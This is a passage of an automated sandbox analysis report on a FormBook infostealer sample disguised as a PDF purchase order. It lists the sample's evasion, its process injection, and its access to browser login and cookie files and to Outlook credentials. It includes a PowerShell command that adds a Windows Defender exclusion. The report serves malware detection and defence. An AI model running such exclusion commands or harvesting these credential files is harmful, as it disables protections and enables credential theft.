                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DEA60 mov eax, dword ptr fs:[00000030h]4_2_011DEA60
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01168A90 mov edx, dword ptr fs:[00000030h]4_2_01168A90
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113EA80 mov eax, dword ptr fs:[00000030h]4_2_0113EA80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204A80 mov eax, dword ptr fs:[00000030h]4_2_01204A80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory written: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: NULL target: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\shutdown.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: NULL target: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: NULL target: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\shutdown.exeThread register set: target process: 5748Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\shutdown.exeThread APC queued: target process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess created: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: MKVNVRSuoK.exe, 00000006.00000002.4472874859.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000000.2140392250.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000000.2284902717.00000000015D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: MKVNVRSuoK.exe, 00000006.00000002.4472874859.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000000.2140392250.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000000.2284902717.00000000015D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: MKVNVRSuoK.exe, 00000006.00000002.4472874859.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000000.2140392250.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000000.2284902717.00000000015D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: MKVNVRSuoK.exe, 00000006.00000002.4472874859.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000000.2140392250.0000000001961000.00000002.00000001.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000000.2284902717.00000000015D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeQueries volume information: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\shutdown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
